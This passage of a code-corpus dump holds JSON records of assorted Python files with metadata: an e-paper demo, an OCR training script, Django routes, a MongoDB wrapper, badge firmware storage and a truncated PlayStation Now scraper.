"call"}, {"api_name": "numpy.ones", "line_number": 375, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cla", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 436, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 437, "usage_type": "attribute"}, {"api_name": 
"numpy.linalg.norm", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 438, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 439, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 443, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 465, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 525, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 533, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 537, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 540, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 542, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 545, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 563, "usage_type": "call"}]} +{"seq_id": "4944138915", "text": "import sys\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom EPD import EPD\n\nWHITE = 1\nBLACK = 0\n\ndef main(argv):\n \"\"\"main program - draw and display a test image\"\"\"\n\n epd = EPD()\n\n print('panel = {p:s} {w:d} x {h:d} version={v:s} COG={g:d} FILM={f:d}'.format(p=epd.panel, w=epd.width, h=epd.height, v=epd.version, g=epd.cog, f=epd.film))\n\n epd.clear()\n\n demo(epd)\n\n\ndef demo(epd):\n \"\"\"simple drawing demo - black drawing on white background\"\"\"\n\n # initially set all white background\n image = Image.new('1', epd.size, WHITE)\n\n # prepare for drawing\n draw = ImageDraw.Draw(image)\n\n # three pixels in top left corner\n draw.point((0, 0), fill=BLACK)\n draw.point((1, 0), fill=BLACK)\n draw.point((0, 1), fill=BLACK)\n\n # lines\n draw.line([(10,20),(100,20)], fill=BLACK)\n draw.line([(10,90),(100,60)], fill=BLACK)\n\n # filled circle, elipse\n draw.ellipse((120, 10, 150, 40), fill=BLACK, outline=BLACK)\n draw.ellipse((120, 60, 170, 90), fill=WHITE, outline=BLACK)\n\n # text\n draw.text((30, 30), 'hello world', fill=BLACK)\n\n # display image on the panel\n epd.display(image)\n epd.update()\n\n\n# main\nif \"__main__\" == __name__:\n if len(sys.argv) < 1:\n sys.exit('usage: {p:s}'.format(p=sys.argv[0]))\n main(sys.argv[1:])\n", "repo_name": "repaper/gratis", "sub_path": "PlatformWithOS/demo/DrawDemo.py", "file_name": "DrawDemo.py", "file_ext": "py", "file_size_in_byte": 1296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 239, "dataset": "github-code", "pt": "86", "api": [{"api_name": "EPD.EPD", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 
55, "usage_type": "attribute"}]} +{"seq_id": "25814224252", "text": "import cv2\nimport os\n\ndef video2imgs(videoPath, imgPath):\n if not os.path.exists(imgPath):\n os.makedirs(imgPath) # 目标文件夹不存在,则创建\n cap = cv2.VideoCapture(videoPath) # 获取视频\n judge = cap.isOpened() # 判断是否能打开成功\n print(judge)\n fps = cap.get(cv2.CAP_PROP_FPS) # 帧率,视频每秒展示多少张图片\n print('fps:',fps)\n\n frames = 1 # 用于统计所有帧数\n count = 1 # 用于统计保存的图片数量\n\n while(judge):\n flag, frame = cap.read() # 读取每一张图片 flag表示是否读取成功,frame是图片\n if not flag:\n print(flag)\n print(\"Process finished!\")\n break\n else:\n if frames % 10 == 0: # 每隔10帧抽一张\n imgname = str(count).rjust(3,'0') + \".jpg\"\n newPath = imgPath + imgname\n print(imgname)\n cv2.imwrite(newPath, frame, [cv2.IMWRITE_JPEG_QUALITY, 100])\n count += 1\n frames += 1\n cap.release()\n print(\"共有 %d 张图片\"%(count-1))\nif __name__ == '__main__':\n video_path = '/Users/huangqiming/Desktop/视神经鞘/optic-nerve-sheath/data/ONSD2/°üÁúÃù/SMP20211020171908/202110201726170031SMP.avi'\n save_path = '/Users/huangqiming/Desktop/视神经鞘/optic-nerve-sheath/data/new/'\n video2imgs(video_path, save_path)", "repo_name": "Duan-Samantha/ONSD", "sub_path": "ONSD/preprocessing/video2images.py", "file_name": "video2images.py", "file_ext": "py", "file_size_in_byte": 1500, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "os.path.exists", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "38986713090", "text": "import requests\nfrom config import api_key\n\nurl = \"https://api.yelp.com/v3/businesses/search\"\n\nheaders = {\n \"Authorization\": \"Bearer \" + api_key\n}\n\nparams = {\n \"term\": \"Barbers\",\n \"location\": \"NYC\"\n}\n\nresponse = requests.get(url, headers=headers, params=params)\n\nbusinesses = response.json()[\"businesses\"]\n\nfor business in businesses:\n print(business[\"name\"])\n", "repo_name": "eglootz/pydev", "sub_path": "codewithmosh/pyyelp/pyyelp.py", "file_name": "pyyelp.py", "file_ext": "py", "file_size_in_byte": 372, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "config.api_key", "line_number": 7, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "38233577712", "text": "import tkinter as tk\nfrom tkinter.ttk import Style\nfrom tkinter import font\nfrom PIL import Image, ImageTk\n\n\"\"\"\nCENTER DIFFERENT WINDOWS IN TKINTER APP FUNCTION\n\"\"\"\n\n\ndef center_window_tk(app_width, app_height, root):\n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n x = (screen_width / 2) - (app_width / 2)\n y = (screen_height / 2) - (app_height / 2)\n root.geometry(f\"{app_width}x{app_height}+{int(x)}+{int(y)}\")\n\n\n\"\"\"\nGET GEY FROM VALUE IN DICTIONARY FUNCTION\n\"\"\"\n\n\ndef get_key_from_value(value, dictionary: dict):\n k = [k for k, v in dictionary.items() if v == value]\n if k:\n return k[0]\n else:\n return None\n\n\n\"\"\"\nPLAY GIF ANIMATION IN TKINTER APP 
FUNCTION\n\"\"\"\n\n\ndef play_gif(root, lbl, img):\n\n gif_file = Image.open(img)\n\n gif_frames = [\n (gif_file.seek(i), gif_file.copy())[1] for i in range(gif_file.n_frames)\n ]\n\n frame_delay = gif_file.info[\"duration\"]\n\n counts_of_frames = len(gif_frames)\n\n frame_count = 0\n\n current_frame = gif_frames[frame_count]\n\n def wrapper():\n nonlocal frame_count, current_frame, counts_of_frames, gif_frames, frame_delay\n\n if frame_count >= counts_of_frames:\n frame_count = 0\n wrapper()\n\n else:\n current_frame = ImageTk.PhotoImage(gif_frames[frame_count])\n lbl.config(image=current_frame)\n frame_count += 1\n\n root.after(frame_delay, wrapper)\n\n wrapper()\n\n\n\"\"\"\nCREATE STYLE FOR DIFFERENT TABS AND FUNCTION TO CHANGE STYLE\n\"\"\"\n\ntabs_color_list = (\"#7fcbff\", \"white\", \"black\", \"#65da65\", \"#ffe3af\", \"#a2a2a2\")\n\n\nclass TabsStyle:\n def __init__(self):\n self.style_sets = {\n 0: \"GuessNumber\",\n 1: \"Hangman\",\n 2: \"Ball8\",\n 3: \"PassworGeneration\",\n 4: \"CaesarCipher\",\n 5: \"NumberConverter\",\n }\n\n self.style = Style()\n\n for i in range(len(tabs_color_list)):\n self.style.theme_create(\n self.style_sets[i],\n parent=\"alt\",\n settings={\n \"TCombobox\": {\n \"configure\": {\n \"selectbackground\": \"#28a428\",\n \"fieldbackground\": \"#32cd32\",\n \"background\": \"#32cd32\",\n \"bordercolor\": \"#32cd32\",\n \"foreground\": \"#253529\",\n \"arrowsize\": 15,\n \"arrowcolor\": \"#253529\",\n }\n },\n \"TNotebook\": {\"configure\": {\"tabmargins\": [6, 5, 2, 0]}},\n \"TNotebook.Tab\": {\n \"configure\": {\"padding\": [8, 5], \"background\": \"#f0f8ff\"},\n \"map\": {\n \"background\": [(\"selected\", tabs_color_list[i])],\n \"foreground\": [\n (\"selected\", f\"{'white' if i == 2 else 'black'}\")\n ],\n \"expand\": [(\"selected\", [3, 3, 3, 3])],\n },\n },\n },\n )\n\n def change_style(self, idx):\n self.style.theme_use(self.style_sets[idx])\n\n\n\"\"\"\nAPP FOR CHOOSING FONT STYLE TO TAB, PROCESSING IMGS FOR APP\n\"\"\"\n\nif __name__ == \"__main__\":\n\n # MAKE APP FOR CHOOSING font for OUR app\n font_look_window = tk.Tk()\n font_look_window.geometry(\"480x480\")\n frame = tk.Frame(font_look_window, width=800, height=275)\n frame.pack()\n frame.grid_propagate(0)\n frame.columnconfigure(0, weight=15)\n our_text = font.Font(family=\"Arial\", size=25)\n\n def change_font(e):\n our_text.config(family=list_lbl.get(list_lbl.curselection()))\n\n text_lbl = tk.Text(frame, font=our_text)\n text_lbl.grid(row=0, column=0)\n text_lbl.rowconfigure(0, weight=1)\n text_lbl.columnconfigure(0, weight=1)\n\n list_lbl = tk.Listbox(font_look_window, selectmode=\"single\", width=100)\n list_lbl.pack()\n\n for f in font.families():\n list_lbl.insert(tk.END, f)\n\n list_lbl.bind(\"<ButtonRelease-1>\", change_font)\n\n font_look_window.mainloop()\n\n \"\"\"CONVERT IMAGE AND CREATE NEGATIVE IMG FOR APP\"\"\"\n # image = Image.open('imgs\\\\NicePng_back-button-png_876153.png')\n # new_image = image.resize((50, 52))\n # new_image.save('imgs\\\\back_btn.png')\n\n # # create negative\n # img = Image.open(r'imgs\\question_btn.png')\n # neg = ImageOps.invert(img.convert('RGB'))\n # neg.save('imgs\\\\negativ.png')\n", "repo_name": "Egor-Kotov/Study", "sub_path": "Projects/PythonGeneration_ForBeginners._MiniProjects/functions_and_style.py", "file_name": "functions_and_style.py", "file_ext": "py", "file_size_in_byte": 4594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "PIL.Image.open", 
"line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 61, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 61, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 88, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 131, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 133, "usage_type": "call"}, {"api_name": "tkinter.font.Font", "line_number": 137, "usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 137, "usage_type": "name"}, {"api_name": "tkinter.Text", "line_number": 142, "usage_type": "call"}, {"api_name": "tkinter.Listbox", "line_number": 147, "usage_type": "call"}, {"api_name": "tkinter.font.families", "line_number": 150, "usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 150, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 151, "usage_type": "attribute"}]} +{"seq_id": "16728195107", "text": "import os\nimport sys\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\nfrom warpctc_pytorch import CTCLoss\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport torch.functional as F\nfrom torch.autograd import Variable as V\nfrom torchvision import transforms\n\nfrom helpers import Converter, Resize, ToTensorTarget, NormalizeTarget, Sharpnes, Blur, Affine, Mono\nfrom models import crnn, densenet\nfrom configs import generator_cfg, trainer_cfg\nfrom datareader import DataStream\n\nt_cfg = trainer_cfg()\ng_cfg = generator_cfg()\n\ndef _acc(preds, labels, lengths, total_size, converter):\n acc = 0\n preds = converter.decode_probs(preds)\n labels = converter.decode(labels, lengths)\n for pred, label in zip(preds, labels):\n if pred.lower() == label.lower():\n acc += 1\n ret = acc / total_size\n return ret\n\n\ndef main():\n global t_cfg\n global g_cfg\n print(g_cfg.alph)\n transform = transforms.Compose([Resize((128, 32)), Affine(),\n ToTensorTarget()])\n # NormalizeTarget([0.485, 0.456, 0.406],\n # [0.229, 0.224, 0.225])])\n\n # data preparation\n # create one fold split with 1/5 ration for validation\n data = pd.read_csv(t_cfg.DATANAME, sep=';', header=None)\n train_data, valid_data = train_test_split(data, test_size=.2, random_state=111)\n\n # train_data.to_csv('./train_data.csv')\n # valid_data.to_csv('./valid_data.csv')\n\n # define data flow for train and valid\n tds = DataStream(train_data, transform=transform)\n tdl = DataLoader(tds, batch_size=t_cfg.bs, shuffle=True, num_workers=23)\n vds = DataStream(valid_data, transform=transform)\n vdl = DataLoader(vds, batch_size=t_cfg.bs, shuffle=True, num_workers=23)\n converter = Converter(g_cfg.alph, ignore_case=False)\n\n # model/criterion define and optimizator selection\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = crnn.CRNN(3, len(g_cfg.alph) + 1, 256).to(device)\n # model = densenet.DenseNet(num_classes=len(g_cfg.alph)+1).to(device)\n # criterion = nn.CTCLoss()\n criterion = CTCLoss()\n optimizer = optim.Adam(model.parameters(),\n lr=t_cfg.lr,\n weight_decay=t_cfg.wl2,\n )\n # lr_sched = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min')\n # lr_sched = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[15,20],gamma=0.05)\n lr_sched = optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.95)\n\n for epoch in range(t_cfg.epochs):\n loss, acc = do_epoch(tdl,\n 
model,\n optimizer,\n criterion,\n lr_sched,\n device,\n converter,\n mode='train',\n )\n print()\n if epoch > t_cfg.pivot:\n if loss < t_cfg.valid_loss:\n t_cfg.valid_loss = loss\n acc = do_epoch(vdl,\n model,\n optimizer,\n criterion,\n lr_sched,\n device,\n converter,\n mode='valid',\n )\n torch.save(model, './model.pt')\n print('Validation acc: %.5f' % acc)\n lr_sched.step()\n print('Finished epoch: %d' % epoch, 'Loss: %.8f' % loss,\n 'Acc: %.3f\\n' % acc)\n\ndef do_epoch(dl,\n model,\n optimizer,\n criterion,\n lr_sched,\n device,\n converter,\n mode='train',\n ):\n global t_cfg\n global g_cfg\n L = []\n A = []\n if mode == 'train':\n model.train()\n # handle smaller batch\n try:\n for idx, sample in enumerate(dl):\n X = V(sample['img'].to(device))\n Y, Y_lengths = converter.encode(sample['label'])\n # Y = Y.to(device)\n\n optimizer.zero_grad()\n\n y_hat = model(X)\n\n preds_size = torch.IntTensor(t_cfg.bs).fill_(y_hat.shape[0])\n loss = criterion(y_hat, Y, preds_size, Y_lengths) / Y.size()[0]\n loss.backward()\n torch.nn.utils.clip_grad_norm(model.parameters(), 5)\n optimizer.step()\n\n l = loss.detach().cpu().numpy()\n\n L.append(l)\n\n # acc = _acc(y_hat, Y, Y_lengths, t_cfg.bs, converter)\n acc = 0\n A.append(acc)\n\n print('\\r', 'Train step: %d' % (idx+1), '|', len(dl),\n 'Loss %.8f' % np.mean(L), end=' ')\n except:\n print('--')\n return np.mean(L), np.mean(A)\n\n elif mode == 'valid':\n with torch.no_grad():\n for idx, sample in enumerate(dl):\n X = V(sample['img'].to(device))\n Y, Y_lengths = converter.encode(sample['label'])\n # Y = Y.to(device)\n y_hat = model(X)\n\n preds_size = torch.IntTensor(t_cfg.bs).fill_(y_hat.shape[0])\n acc = _acc(y_hat, Y, Y_lengths, t_cfg.bs, converter)\n A.append(acc)\n\n print('\\r', 'Val step: %d' % (idx + 1), '|', len(dl),\n 'Acc: %.5f' % acc, end=' ')\n return np.mean(A)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "frmsvrt/OCR", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 5590, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "configs.trainer_cfg", "line_number": 23, "usage_type": "call"}, {"api_name": "configs.generator_cfg", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "helpers.Resize", "line_number": 41, "usage_type": "call"}, {"api_name": "helpers.Affine", "line_number": 41, "usage_type": "call"}, {"api_name": "helpers.ToTensorTarget", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 49, "usage_type": "call"}, {"api_name": "datareader.DataStream", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 56, "usage_type": "call"}, {"api_name": "datareader.DataStream", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 58, "usage_type": "call"}, {"api_name": "helpers.Converter", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.crnn.CRNN", "line_number": 63, 
"usage_type": "call"}, {"api_name": "models.crnn", "line_number": 63, "usage_type": "name"}, {"api_name": "warpctc_pytorch.CTCLoss", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ExponentialLR", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.IntTensor", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.IntTensor", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "4293661879", "text": "from django.conf.urls import url\n\nfrom fyt.emails.views import (\n Applicants,\n IncomingStudents,\n LeadersBySection,\n LeadersByTripType,\n Trippees,\n TrippeesByTripType,\n)\n\n\nurlpatterns = [\n url(r'^applicants/$', Applicants.as_view(), name='applicants'),\n url(\n r'^leaders/by-triptype/$',\n LeadersByTripType.as_view(),\n name='leaders_by_triptype',\n ),\n url(\n r'^leaders/by-section/$', LeadersBySection.as_view(), name='leaders_by_section'\n ),\n url(r'^incoming/$', IncomingStudents.as_view(), name='incoming'),\n url(r'^trippees/$', Trippees.as_view(), name='trippees'),\n url(\n r'^trippees/by-triptype/$',\n TrippeesByTripType.as_view(),\n name='trippees_by_triptype',\n ),\n\n]\n", "repo_name": "rlmv/doc-trips", "sub_path": "fyt/emails/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "fyt.emails.views.Applicants.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "fyt.emails.views.Applicants", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersByTripType.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersByTripType", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersBySection.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersBySection", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "fyt.emails.views.IncomingStudents.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "fyt.emails.views.IncomingStudents", "line_number": 23, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, 
{"api_name": "fyt.emails.views.Trippees.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "fyt.emails.views.Trippees", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "fyt.emails.views.TrippeesByTripType.as_view", "line_number": 27, "usage_type": "call"}, {"api_name": "fyt.emails.views.TrippeesByTripType", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "22034682722", "text": "from pymongo import MongoClient, ASCENDING\n\nfrom dicetables_db.connections.baseconnection import BaseConnection\n\n\nclass MongoDBConnection(BaseConnection):\n def __init__(self, db_name: str, collection_name: str, ip='localhost', port=27017):\n self._client = MongoClient(ip, port)\n self._db = self._client[db_name]\n self._collection = self._db[collection_name]\n self._params_storage = (db_name, collection_name, ip, str(port))\n self._place_holder = None\n\n def is_collection_empty(self):\n return not self._collection.count()\n\n def get_info(self):\n indices = self._get_indices()\n info = {\n 'db': self._db.name,\n 'collections': self._db.collection_names(),\n 'current_collection': self._collection.name,\n 'indices': indices,\n 'ip': self._params_storage[2],\n 'port': self._params_storage[3]\n }\n return info\n\n def _get_indices(self):\n out = []\n if self._collection.name in self._db.collection_names():\n index_info = self._collection.index_information()\n use_keys = [key for key in self._collection.index_information() if key != '_id_']\n for key in use_keys:\n columns = [pair[0] for pair in index_info[key]['key']]\n out.append(tuple(columns))\n out.sort()\n return out\n\n def reset_collection(self):\n self.drop_collection()\n\n def drop_collection(self):\n self._db.drop_collection(self._collection.name)\n\n def close(self):\n if self._client:\n self._client.close()\n self._client = None\n self._collection = None\n self._db = None\n\n def find(self, params_dict=None, projection=None):\n \"\"\"\n\n :return: iterable of results\n \"\"\"\n new_params, new_projection = self._prep_find_inputs(params_dict, projection)\n results = self._collection.find(new_params, new_projection)\n return [self._result_with_new_id(result) for result in results]\n\n def find_one(self, params_dict=None, projection=None):\n new_params, new_projection = self._prep_find_inputs(params_dict, projection)\n result = self._collection.find_one(new_params, new_projection)\n return self._result_with_new_id(result)\n\n def _prep_find_inputs(self, params_dict, projection):\n new_params = self._params_with_new_id(params_dict)\n self._raise_error_for_bad_projection(projection)\n new_projection = self._make_consistent_projection_api(projection)\n return new_params, new_projection\n\n def _params_with_new_id(self, params):\n convert_method = self.id_class().to_bson_id\n return self._dict_with_new_id(convert_method, params)\n\n def _result_with_new_id(self, result):\n convert_method = self.id_class().from_bson_id\n return self._dict_with_new_id(convert_method, result)\n\n @staticmethod\n def _dict_with_new_id(convert_method, input_dict):\n if input_dict is None:\n return None\n return {key: convert_method(val) if key == '_id' else val for key, val in input_dict.items()}\n\n @staticmethod\n def _raise_error_for_bad_projection(projection):\n if projection:\n bool_values = [bool(value) for value in projection.values()]\n if True in bool_values and False in bool_values:\n raise ValueError('Projection cannot have a mix of inclusion and exclusion.')\n\n 
@staticmethod\n    def _make_consistent_projection_api(projection):\n        if not projection:\n            return None\n        new_projection = {key: bool(value) for key, value in projection.items()}\n        if True in new_projection.values():\n            if '_id' not in new_projection.keys():\n                new_projection['_id'] = False\n        return new_projection\n\n    def insert(self, document):\n        \"\"\"\n\n        :return: ObjectId\n        \"\"\"\n        to_insert = document.copy()\n        obj_id = self._collection.insert_one(to_insert).inserted_id\n        return self.id_class().from_bson_id(obj_id)\n\n    def create_index(self, column_tuple):\n        params = [(column_name, ASCENDING) for column_name in column_tuple]\n        self._collection.create_index(params)\n\n    def has_index(self, columns_tuple):\n        indices = self.get_info()['indices']\n        return columns_tuple in indices\n\n", "repo_name": "eric-s-s/dicetables_db", "sub_path": "dicetables_db/connections/mongodb_connection.py", "file_name": "mongodb_connection.py", "file_ext": "py", "file_size_in_byte": 4396, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "dicetables_db.connections.baseconnection.BaseConnection", "line_number": 6, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "pymongo.ASCENDING", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "9187465958", "text": "import ujson as json\nimport os\n\n\nclass Storage:\n\n    def __init__(self, kernel, file, defaults={}):\n        self.kernel = kernel\n        self._file = file\n        self._data = defaults\n        try:\n            with open(self._file, 'r') as f:\n                data = json.load(f)\n                if not isinstance(data, dict):\n                    raise ValueError(\"Only dicts can be loaded\")\n                self._data.update(data)\n        except:\n            pass\n        self._data.setdefault('_settings', {})\n\n    def update(self):\n        result = self.kernel.http.post('/settings/update')\n        import gc\n        gc.collect()\n        if result is None:\n            return False\n        if result.status_code != 200:\n            return False\n        json = result.json()\n        if type(json) is not dict:\n            return False\n        json = json['response']\n        if type(json) is not dict:\n            return False\n        name = json.get('name', None)\n        if name:\n            self._data['NAME'] = name\n        image = json.get('image', None)\n        if image:\n            self._data['IMAGE'] = image\n        schedule = json.get('schedule', None)\n        if schedule:\n            self._data['SCHEDULE'] = schedule\n        settings = json.get('settings', {})\n        for k, v in [(key, settings[key]) for key in settings.keys()]:\n            self._data['_settings'][k] = v\n        self._save()\n        return True\n\n    def _save(self, remote=True):\n        with open(self._file, 'w') as f:\n            json.dump(self._data, f)\n\n    def __getattr__(self, item):\n        return self._data.get(item, None)\n\n    def __getitem__(self, item):\n        return self._data.get(item, None)\n\n    def __setitem__(self, key, value):\n        self._data[key] = value\n        self._save()\n\n    def get(self, item, default=None):\n        if not item.startswith(self.kernel.app + '.'):\n            return default\n        return self._data['_settings'].get(item, default)\n\n    def set(self, key, value):\n        result = self.kernel.http.post('/settings/set', json={key: value})\n        if result is not None and result.status_code == 204:\n            self._data['_settings'][key] = value\n\n    def sync(self):\n        if self.kernel.ensure_registration() > 0:\n            return\n        result = self.kernel.http.post('/name', json={'name': self.NAME})\n\n    def wipe(self):\n        try:\n            os.remove(self._file)\n        except:\n            pass\n\n\n\n\n", "repo_name": "ernw/tr19-badge-firmware", "sub_path": "ports/esp32/modules/system/storage.py", "file_name": "storage.py", "file_ext": "py", 
"file_size_in_byte": 2459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "ujson.load", "line_number": 13, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 24, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 35, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 38, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 41, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 44, "usage_type": "call"}, {"api_name": "ujson.dump", "line_number": 52, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "35100526416", "text": "import requests\nimport json\nimport html\nfrom html2json import collect\nfrom bs4 import BeautifulSoup\nfrom bs2json import bs2json\nimport csv\nimport ast\nimport time\n\nwith open('psnowgamelist.csv', mode='w', encoding=\"utf-8\", newline='') as gamelist_file:\n fieldname = ['Game', 'Console', 'Until']\n gamelist = csv.DictWriter(gamelist_file, fieldnames=fieldname)\n gamelist.writeheader()\n url = \"https://psvrtrophy.software.eu.playstation.com/ps-now/data_sync\"\n\n headers = {\n 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n# 'Origin': 'https://www.playstation.com',\n# 'Sec-Fetch-Site': 'same-site',\n# 'Sec-Fetch-Mode': 'cors',\n# 